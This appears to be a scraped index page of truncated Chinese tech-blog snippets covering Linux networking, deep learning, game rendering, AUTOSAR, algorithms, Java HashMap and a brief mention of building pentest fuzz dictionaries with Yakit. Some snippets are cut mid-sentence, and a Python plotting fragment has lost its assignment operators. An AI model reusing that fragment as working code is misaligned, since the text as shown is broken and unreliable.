1.RHEL9版本中,使用nm进行网络配置,ifcfg不再是网络配置文件的主存储,样式仍然可用,但它不再是NetworkManger存储新网络配置文件的默认位置,RHEL以key-file格式在etc/NetworkManger/system-connections/中存储新的网络…...
【深度学习—李宏毅教程笔记】Transformer
目录 一、序列到序列(Seq2Seq)模型 1、Seq2Seq基本原理 2、Seq2Seq模型的应用 3、Seq2Seq模型还能做什么? 二、Encoder 三、Decoder 1、Decoder 的输入与输出 2、Decoder 的结构 3、Non-autoregressive Decoder 四、Encoder 和 De…...
关于UE5的抗锯齿和TAA
关于闪烁和不稳定现象的详细解释 当您关闭抗锯齿技术时,场景中会出现严重的闪烁和不稳定现象,尤其在有细节纹理和小物体的场景中。这种现象的技术原因如下: 像素采样问题 在3D渲染中,每个像素只能表示一个颜色值,但…...
交换网络基础
学习目标 掌握交换机的基本工作原理 掌握交换机的基本配置 交换机的基本工作原理 交换机是局域网(LAN)中实现数据高效转发的核心设备,工作在 数据链路层(OSI 模型第二层),其基本工作原理可概括为 “学习…...
AUTOSAR图解==>AUTOSAR_SWS_EFXLibrary
AUTOSAR 扩展定点数学函数库(EFX)分析 1. 概述 AUTOSAR (AUTomotive Open System ARchitecture) 是汽车电子控制单元(ECU)软件架构的开放标准。在AUTOSAR架构中,扩展定点数学函数库(Extended Fixed-point library, EFX)提供了一组优化的定点数学运算函数ÿ…...
的坐标)
六边形棋盘格(Hexagonal Grids)的坐标
1. 二位坐标转六边形棋盘的方式 1-1这是“波动式”的 这种就是把【方格子坐标】“左右各错开半个格子”做到的 具体来说有如下几种情况 具体到庙算平台上,是很巧妙的用一个4位整数,前两位为x、后两位为y来进行表示 附上计算距离的代码 def get_hex_di…...
李宏毅NLP-5-RNNTNeural TransducerMoChA
RNN Transducer(RNN-T) 循环神经对齐器(RNA,Recurrent Neural Aligner)对CTC解码器的改进,具体内容如下: “RNA”,全称 “Recurrent Neural Aligner”,引用来自 [Sak, et al., INTERSPEECH’17…...
GPT-SoVITS 使用指南
一、简介 TTS(Text-to-Speech,文本转语音):是一种将文字转换为自然语音的技术,通过算法生成人类可听的语音输出,广泛应用于语音助手、无障碍服务、导航系统等场景。类似的还有SVC(歌声转换&…...
洛谷的几道题
P1000 超级玛丽游戏 # P1000 超级玛丽游戏 ## 题目背景 本题是洛谷的试机题目,可以帮助了解洛谷的使用。 建议完成本题目后继续尝试 [P1001](/problem/P1001)、[P1008](/problem/P1008)。 另外强烈推荐[新用户必读帖](/discuss/show/241461)。 ## 题目描述 …...
利用yakit充实渗透字典
前言 在渗透侧测试结束,在我们的历史记录中会保存过程中的数据包。在其中有些特征,比如API、参数,可以活用于下次的渗透。 比如 fuzz变量,fuzz隐藏API…… 但是我们一个一个提取很麻烦,可以使用yakit的插件…...
:开启数据驱动的创业之旅)
精益数据分析(4/126):开启数据驱动的创业之旅
精益数据分析(4/126):开启数据驱动的创业之旅 在创业的浪潮中,我们都怀揣着梦想,渴望找到那条通往成功的道路。作为一名在创业和数据分析领域摸爬滚打多年的“老兵”,我深知其中的艰辛与挑战。今天&#x…...
机器学习误差图绘
机器学习误差图绘制 绘图类 # Define the ModelComparisonPlot class class ModelComparisonPlot:def __init__(self, model_name):self.model_name model_namedef plot_comparison(self, y_val, y_pred, mse, mae, r2):# Create a figure with two subplotsfig, axes plt.…...
企业级RAG选择难题:数据方案的关键博弈
企业级RAG选择难题:数据方案的关键博弈 向量数据库:高效但易失语境图数据库与知识图谱:关系网络的力量企业级RAG数据方案的最佳实践 智能时代,企业数据每日剧增。员工寻找答案的效率直接影响工作流程,StackOverflow调查…...
JNI 学习
1. JNI 不属于 C,而是 JDK 的 日志失效,可以 adb kill-server adb kill-serveradb start-server 使用 jni final和 private变量都能修改...
PyTorch :优化的张量库
PyTorch 是一个基于 Python 的开源机器学习框架,由 Facebook 的 AI 研究团队(现 Meta AI)于 2016 年推出。它专为深度学习设计,但也可用于传统的机器学习任务。PyTorch 的核心优势在于灵活性、动态计算图和易…...
DevOps 进阶指南:如何让工作流更丝滑?
DevOps 进阶指南:如何让工作流更丝滑? 引言 在 DevOps 世界里,我们追求的是高效、稳定、自动化。但现实总是充满挑战:代码部署失败、CI/CD 过程卡顿、环境不一致……这些痛点让开发和运维团队疲惫不堪。今天,我就来聊聊如何优化 DevOps 工作流,通过实战案例和代码示例,…...
BT-Basic函数之首字母XY
BT-Basic函数之首字母XY 文章目录 BT-Basic函数之首字母XYXxd__ commands Yyes X xd__ commands 当使用外部设备时,开发人员需要在测试计划中添加适当的命令来控制这些设备。下表显示了一个典型的命令序列。 典型的命令序列 NO命令描述1xdload将DLL加载到内存中…...
6. 话题通信 ---- 使用自定义msg,发布方和订阅方cpp,python文件编写
1)在功能包下新建msg目录,在msg目录下新建Person.msg,在Person.msg文件写入: string name uint16 age float64 height 2)修改配置文件 2.1) 功能包下package.xml文件修改 <build_depend>message_generation</build_depend><exec_depend…...
Fastdata极数:全球AR/VR行业发展趋势报告2025
科技的快速发展孕育了一个新的数字前沿领域,那就是虚拟宇宙,也就是我们谈论的元宇宙(Metaverse),虚拟宇宙最初构思于尼尔斯蒂芬森的科幻小说《雪崩》中,小说中虚拟宇宙由虚拟人物居住,并以数字方…...
背包 DP 详解
文章目录 背包DP01 背包完全背包多重背包二进制优化单调队列优化 小结 背包DP 背包 DP,说白了就是往一个背包里扔东西,求最后的最大价值是多少,一般分为了三种:01 背包、完全背包和多重背包。而 01 背包则是一切的基础。 01 背包…...
深入剖析 HashMap:内部结构与性能优化
深入剖析 HashMap:内部结构与性能优化 引言 HashMap 是 Java 集合框架中的核心类,广泛应用于数据存储和检索场景。本文将深入剖析其内部结构,包括数组、链表和红黑树的转换机制,帮助读者理解其工作原理和性能优化策略。 1. Hash…...
数据从辅存调入主存,页表中一定存在
在虚拟内存系统中,数据从辅存调入主存时,页表中一定存在对应的页表项,但页表项的「存在状态」会发生变化。以下是详细分析: 关键逻辑 页表的作用 页表是虚拟内存的核心数据结构,记录了虚拟地址到物理地址的映射关系…...